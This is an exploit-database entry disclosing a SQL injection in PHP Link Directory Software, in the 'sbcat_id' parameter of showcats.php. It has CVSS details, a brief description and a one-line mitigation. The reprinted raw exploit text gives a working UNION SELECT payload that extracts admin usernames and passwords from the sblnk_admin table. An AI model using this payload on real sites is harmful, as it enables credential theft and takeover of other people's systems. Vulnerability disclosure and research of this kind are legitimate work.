header-logo
Suggest Exploit
vendor:
PHP Link Directory Software
by:
BorN To K!LL - h4ck3r
8.8
CVSS
HIGH
SQL Injection
89
CWE
Product Name: PHP Link Directory Software
Affected Version From: n/a
Affected Version To: n/a
Patch Exists: NO
Related CWE: n/a
CPE: a:softbizsolutions:php_link_directory_software
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: n/a
n/a

PHP link Directory software SQL Injection Vulnerability

The vulnerability exists due to insufficient filtration of user-supplied data passed via the 'sbcat_id' parameter to '/showcats.php' script. A remote attacker can execute arbitrary SQL commands in application's database, cause denial of service, access or modify sensitive data, exploit various vulnerabilities in the underlying SQL server software, etc.

Mitigation:

Input validation should be used to prevent SQL injection attacks.
Source

Exploit-DB raw data:

==
[|]Author: BorN To K!LL - h4ck3r
[|]Contact: SQL@hotmail.co.uk
==
[|]Script: PHP link Directory software
[|]Version: n/a
[|]Link: http://www.softbizsolutions.com/php-link-directory-software.php
==
[|]3xploit:
[path]/showcats.php?sbcat_id=[SQL-Injection]
 
[|]3xample:
[path]/showcats.php?sbcat_id=-9999+union+all+select+1,concat(username,0x3a,password),3,4+from+sblnk_admin--

==
[|]Greetings:
darkc0de team, AsbMay's group, w4ck1ng team , and "Kuwaitis"
==